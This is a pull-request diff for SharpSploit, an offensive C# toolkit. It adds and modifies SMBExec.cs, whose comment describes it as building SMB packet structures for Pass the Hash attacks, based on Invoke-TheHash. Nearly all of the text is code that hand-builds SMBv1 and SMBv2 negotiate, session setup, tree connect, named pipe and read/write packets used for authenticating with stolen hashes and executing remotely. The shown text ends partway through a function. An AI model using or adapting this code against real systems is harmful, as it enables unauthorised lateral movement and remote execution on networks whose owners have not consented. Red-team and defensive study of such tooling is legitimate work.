### PR TITLE
Merge pth into master

### DIFF
--- a/SharpSploit/Execution/PassTheHash/SMBExec.cs
+++ b/SharpSploit/Execution/PassTheHash/SMBExec.cs
@@ -1,7 +1,7 @@
 ﻿using SharpSploit.Misc;
 using System;
 using System.Collections.Specialized;
-
+using System.Linq;
 
 namespace SharpSploit.Execution
 {
@@ -235,7 +235,8 @@ namespace SharpSploit.Execution
 
             if (message_ID.Length == 4)
             {
-                message_ID = Utilities.CombineByteArray(message_ID, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                message_ID = message_ID.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                //message_ID = Utilities.CombineByteArray(message_ID, new byte[] { 0x00, 0x00, 0x00, 0x00 });
             }
 
             OrderedDictionary packet_SMB2Header = new OrderedDictionary();
@@ -636,11 +637,10 @@ namespace SharpSploit.Execution
             Random r = new Random();
             byte[] packet_referent_init = new byte[2];
             r.NextBytes(packet_referent_init);
-            byte[] nulls = { 0x00, 0x00 };
-            byte[] packet_referent_ID1 = Utilities.CombineByteArray(packet_referent_init, nulls);
+            byte[] packet_referent_ID1 = packet_referent_init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
             byte[] packet_referent_init2 = new byte[2];
             r.NextBytes(packet_referent_init2);
-            byte[] packet_referent_ID2 = Utilities.CombineByteArray(packet_referent_init2, nulls);
+            byte[] packet_referent_ID2 = packet_referent_init2.Concat(new byte[] { 0x00, 0x00 }).ToArray();
 
 
             OrderedDictionary packet_SCMOpenSCManagerW = new OrderedDictionary();

--- a/SharpSploit/Execution/PassTheHash/SMBExec.cs
+++ b/SharpSploit/Execution/PassTheHash/SMBExec.cs
@@ -1,0 +1,724 @@
+﻿using SharpSploit.Misc;
+using System;
+using System.Collections.Specialized;
+
+
+namespace SharpSploit.Execution
+{
+    public class SMBExec
+    {
+        /// <summary>
+        /// SMBExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
+        /// </summary>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
+        
+        #region SMBv1
+        public static OrderedDictionary NetBIOSSessionService(int packet_header_length, int packet_data_length)
+        {
+            byte[] packet_netbios_session_service_length = BitConverter.GetBytes(packet_header_length + packet_data_length);
+            packet_netbios_session_service_length = new byte[] { packet_netbios_session_service_length[2], packet_netbios_session_service_length[1], packet_netbios_session_service_length[0] };
+
+            OrderedDictionary packet_NetBIOSSessionService = new OrderedDictionary();
+            packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type", new byte[] { 0x00 });
+            packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length", packet_netbios_session_service_length);
+
+            return packet_NetBIOSSessionService;
+        }
+        public static OrderedDictionary SMBHeader(byte[] packet_command, byte[] packet_flags, byte[] packet_flags2, byte[] packet_tree_ID, byte[] packet_process_ID, byte[] packet_user_ID)
+        {
+            byte[] ProcessID = new byte[2] { packet_process_ID[0], packet_process_ID[1] };
+            OrderedDictionary packet_SMBHeader = new OrderedDictionary();
+            packet_SMBHeader.Add("SMBHeader_Protocol", new byte[] { 0xff, 0x53, 0x4d, 0x42 });
+            packet_SMBHeader.Add("SMBHeader_Command", packet_command);
+            packet_SMBHeader.Add("SMBHeader_ErrorClass", new byte[] { 0x00 });
+            packet_SMBHeader.Add("SMBHeader_Reserved", new byte[] { 0x00 });
+            packet_SMBHeader.Add("SMBHeader_ErrorCode", new byte[] { 0x00, 0x00 });
+            packet_SMBHeader.Add("SMBHeader_Flags", packet_flags);
+            packet_SMBHeader.Add("SMBHeader_Flags2", packet_flags2);
+            packet_SMBHeader.Add("SMBHeader_ProcessIDHigh", new byte[] { 0x00, 0x00 });
+            packet_SMBHeader.Add("SMBHeader_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBHeader.Add("SMBHeader_Reserved2", new byte[] { 0x00, 0x00 });
+            packet_SMBHeader.Add("SMBHeader_TreeID", packet_tree_ID);
+            packet_SMBHeader.Add("SMBHeader_ProcessID", ProcessID);
+            packet_SMBHeader.Add("SMBHeader_UserID", packet_user_ID);
+            packet_SMBHeader.Add("SMBHeader_MultiplexID", new byte[] { 0x00, 0x00 });
+            return packet_SMBHeader;
+        }
+        public static OrderedDictionary SMBNegotiateProtocolRequest(bool ForceSMB1)
+        {
+            byte[] packet_byte_count;
+            if (ForceSMB1)
+            {
+                packet_byte_count = new byte[] { 0x0c, 0x00 };
+            }
+            else
+            {
+                packet_byte_count = new byte[] { 0x22, 0x00 };
+            }
+            //https://msdn.microsoft.com/en-us/library/ee441572.aspx
+            OrderedDictionary packet_SMBNegotiateProtocolRequest = new OrderedDictionary();
+            packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount", new byte[] { 0x00 });
+            packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount", packet_byte_count);
+            packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat", new byte[] { 0x02 });
+            packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name", new byte[] { 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 });
+
+            if (!ForceSMB1)
+            {
+                packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2", new byte[] { 0x02 });
+                packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x30, 0x30, 0x32, 0x00 });
+                packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3", new byte[] { 0x02 });
+                packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x3f, 0x3f, 0x3f, 0x00 });
+            }
+
+            return packet_SMBNegotiateProtocolRequest;
+        }
+        public static OrderedDictionary SMBSessionSetupAndXRequest(byte[] packet_security_blob)
+        {
+            //https://msdn.microsoft.com/en-us/library/ee441849.aspx
+
+
+            byte[] packet_byte_count = BitConverter.GetBytes(packet_security_blob.Length);
+            byte[] packet_byte_count2 = { packet_byte_count[0], packet_byte_count[1] };
+            byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length + 5);
+            byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
+
+            OrderedDictionary packet_SMBSessionSetupAndXRequest = new OrderedDictionary();
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount", new byte[] { 0x0c });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand", new byte[] { 0xff });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved", new byte[] { 0x00 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer", new byte[] { 0xff, 0xff });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount", new byte[] { 0x02, 0x00 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber", new byte[] { 0x01, 0x00 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength", packet_byte_count2);
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities", new byte[] { 0x44, 0x00, 0x00, 0x80 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount", packet_security_blob_length2);
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob", packet_security_blob);
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS", new byte[] { 0x00, 0x00, 0x00 });
+            packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage", new byte[] { 0x00, 0x00 });
+
+            return packet_SMBSessionSetupAndXRequest;
+        }
+        public static OrderedDictionary SMBTreeConnectAndXRequest(byte[] packet_path)
+        {
+            byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length + 7);
+            packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
+
+            OrderedDictionary packet_SMBTreeConnectAndXRequest = new OrderedDictionary();
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount", new byte[] { 0x04 });
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand", new byte[] { 0xff });
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved", new byte[] { 0x00 });
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags", new byte[] { 0x00, 0x00 });
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength", new byte[] { 0x01, 0x00 });
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount", packet_path_length);
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password", new byte[] { 0x00 });
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree", packet_path);
+            packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service", new byte[] { 0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 });
+
+            return packet_SMBTreeConnectAndXRequest;
+        }
+        public static OrderedDictionary SMBNTCreateAndXRequest(byte[] packet_named_pipe)
+        {
+            byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
+            byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
+            byte[] packet_file_name_length = BitConverter.GetBytes(packet_named_pipe.Length - 1);
+            byte[] packet_file_name_length2 = { packet_file_name_length[0], packet_file_name_length[1] };
+
+            OrderedDictionary packet_SMBNTCreateAndXRequest = new OrderedDictionary();
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount", new byte[] { 0x18 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand", new byte[] { 0xff });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved", new byte[] { 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2", new byte[] { 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen", packet_file_name_length2);
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags", new byte[] { 0x16, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask", new byte[] { 0x00, 0x00, 0x00, 0x02 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess", new byte[] { 0x07, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags", new byte[] { 0x00 });
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount", packet_named_pipe_length2);
+            packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename", packet_named_pipe);
+
+            return packet_SMBNTCreateAndXRequest;
+        }
+        public static OrderedDictionary SMBReadAndXRequest(byte[] SMB_FID)
+        {
+
+            if (SMB_FID == null)
+            {
+                SMB_FID = new byte[] { 0x00, 0x40 };
+            }
+            OrderedDictionary packet_SMBReadAndXRequest = new OrderedDictionary();
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount", new byte[] { 0x0a });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand", new byte[] { 0xff });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved", new byte[] { 0x00 });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID", SMB_FID);
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow", new byte[] { 0x58, 0x02 });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount", new byte[] { 0x58, 0x02 });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown", new byte[] { 0xff, 0xff, 0xff, 0xff });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining", new byte[] { 0x00, 0x00 });
+            packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
+
+            return packet_SMBReadAndXRequest;
+        }
+        public static OrderedDictionary SMBWriteAndXRequest(byte[] packet_file_ID, int packet_RPC_length)
+        {
+            byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
+            packet_write_length = new byte[] { packet_write_length[0], packet_write_length[1] };
+
+            OrderedDictionary packet_SMBWriteAndXRequest = new OrderedDictionary();
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount", new byte[] { 0x0e });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand", new byte[] { 0xff });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved", new byte[] { 0x00 });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID", packet_file_ID);
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset", new byte[] { 0xea, 0x03, 0x00, 0x00 });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2", new byte[] { 0xff, 0xff, 0xff, 0xff });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode", new byte[] { 0x08, 0x00 });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining", packet_write_length);
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh", new byte[] { 0x00, 0x00 });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow", packet_write_length);
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset", new byte[] { 0x3f, 0x00 });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount", packet_write_length);
+
+            return packet_SMBWriteAndXRequest;
+        }
+        public static OrderedDictionary SMBCloseRequest(byte[] packet_file_ID)
+        {
+
+            OrderedDictionary packet_SMBCloseRequest = new OrderedDictionary();
+            packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount", new byte[] { 0x03 });
+            packet_SMBCloseRequest.Add("SMBCloseRequest_FID", packet_file_ID);
+            packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite", new byte[] { 0xff, 0xff, 0xff, 0xff });
+            packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount", new byte[] { 0x00, 0x00 });
+
+            return packet_SMBCloseRequest;
+        }
+        public static OrderedDictionary SMBTreeDisconnectRequest()
+        {
+            OrderedDictionary packet_SMBTreeDisconnectRequest = new OrderedDictionary();
+            packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount", new byte[] { 0x00 });
+            packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount", new byte[] { 0x00, 0x00 });
+            return packet_SMBTreeDisconnectRequest;
+        }
+        public static OrderedDictionary SMBLogoffAndXRequest()
+        {
+            OrderedDictionary packet_SMBLogoffAndXRequest = new OrderedDictionary();
+            packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount", new byte[] { 0x02 });
+            packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand", new byte[] { 0xff });
+            packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved", new byte[] { 0x00 });
+            packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
+            packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
+            return packet_SMBLogoffAndXRequest;
+        }
+        #endregion
+        #region SMBv2
+        //public static OrderedDictionary SMB2Header(byte[] packet_command,bool SMB_signing, int packet_message_ID, byte[] process_id, byte[] packet_tree_ID, byte[] packet_session_ID)
+        public static OrderedDictionary SMB2Header(byte[] packet_command, int packet_message_ID, byte[] packet_tree_ID, byte[] packet_session_ID)
+        {
+
+            byte[] message_ID = BitConverter.GetBytes(packet_message_ID);
+
+            if (message_ID.Length == 4)
+            {
+                message_ID = Utilities.CombineByteArray(message_ID, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            }
+
+            OrderedDictionary packet_SMB2Header = new OrderedDictionary();
+            packet_SMB2Header.Add("SMB2Header_ProtocolID", new byte[] { 0xfe, 0x53, 0x4d, 0x42 });
+            packet_SMB2Header.Add("SMB2Header_StructureSize", new byte[] { 0x40, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_CreditCharge", new byte[] { 0x01, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_ChannelSequence", new byte[] { 0x00, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_Reserved", new byte[] { 0x00, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_Command", packet_command);
+            packet_SMB2Header.Add("SMB2Header_CreditRequest", new byte[] { 0x00, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_NextCommand", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_MessageID", message_ID);
+            packet_SMB2Header.Add("SMB2Header_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2Header.Add("SMB2Header_TreeID", packet_tree_ID);
+            packet_SMB2Header.Add("SMB2Header_SessionID", packet_session_ID);
+            packet_SMB2Header.Add("SMB2Header_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+
+            return packet_SMB2Header;
+
+        }
+        public static OrderedDictionary SMB2NegotiateProtocolRequest()
+        {
+            OrderedDictionary packet_SMB2NegotiateProtocolRequest = new OrderedDictionary();
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize", new byte[] { 0x24, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount", new byte[] { 0x02, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode", new byte[] { 0x01, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved", new byte[] { 0x00, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities", new byte[] { 0x40, 0x00, 0x00, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount", new byte[] { 0x00, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2", new byte[] { 0x00, 0x00 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect", new byte[] { 0x02, 0x02 });
+            packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2", new byte[] { 0x10, 0x02 });
+
+            return packet_SMB2NegotiateProtocolRequest;
+        }
+        public static OrderedDictionary SMB2SessionSetupRequest(byte[] packet_security_blob)
+        {
+            byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length);
+            byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
+
+            OrderedDictionary packet_SMB2SessionSetupRequest = new OrderedDictionary();
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize", new byte[] { 0x19, 0x00 });
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags", new byte[] { 0x00 });
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode", new byte[] { 0x01 });
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset", new byte[] { 0x58, 0x00 });
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength", packet_security_blob_length2);
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer", packet_security_blob);
+
+            return packet_SMB2SessionSetupRequest;
+        }
+        public static OrderedDictionary SMB2TreeConnectRequest(byte[] packet_path)
+        {
+
+            byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length);
+            packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
+            OrderedDictionary packet_SMB2TreeConnectRequest = new OrderedDictionary();
+            packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize", new byte[] { 0x09, 0x00 });
+            packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved", new byte[] { 0x00, 0x00 });
+            packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset", new byte[] { 0x48, 0x00 });
+            packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength", packet_path_length);
+            packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer", packet_path);
+
+            return packet_SMB2TreeConnectRequest;
+        }
+        public static OrderedDictionary SMB2CreateRequestFile(byte[] packet_named_pipe)
+        {
+            byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
+            byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
+            OrderedDictionary packet_SMB2CreateRequestFile = new OrderedDictionary();
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize", new byte[] { 0x39, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags", new byte[] { 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel", new byte[] { 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess", new byte[] { 0x03, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes", new byte[] { 0x80, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions", new byte[] { 0x40, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset", new byte[] { 0x78, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength", packet_named_pipe_length2);
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer", packet_named_pipe);
+
+            return packet_SMB2CreateRequestFile;
+
+        }
+        public static OrderedDictionary SMB2ReadRequest(byte[] packet_file_ID)
+        {
+            OrderedDictionary packet_SMB2ReadRequest = new OrderedDictionary();
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize", new byte[] { 0x31, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding", new byte[] { 0x50 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags", new byte[] { 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length", new byte[] { 0x00, 0x00, 0x10, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID", packet_file_ID);
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset", new byte[] { 0x00, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength", new byte[] { 0x00, 0x00 });
+            packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer", new byte[] { 0x30 });
+
+            return packet_SMB2ReadRequest;
+        }
+        public static OrderedDictionary SMB2WriteRequest(byte[] packet_file_ID, int packet_RPC_length)
+        {
+
+
+            byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
+            OrderedDictionary packet_SMB2WriteRequest = new OrderedDictionary();
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize", new byte[] { 0x31, 0x00 });
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset", new byte[] { 0x70, 0x00 });
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length", packet_write_length);
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID", packet_file_ID);
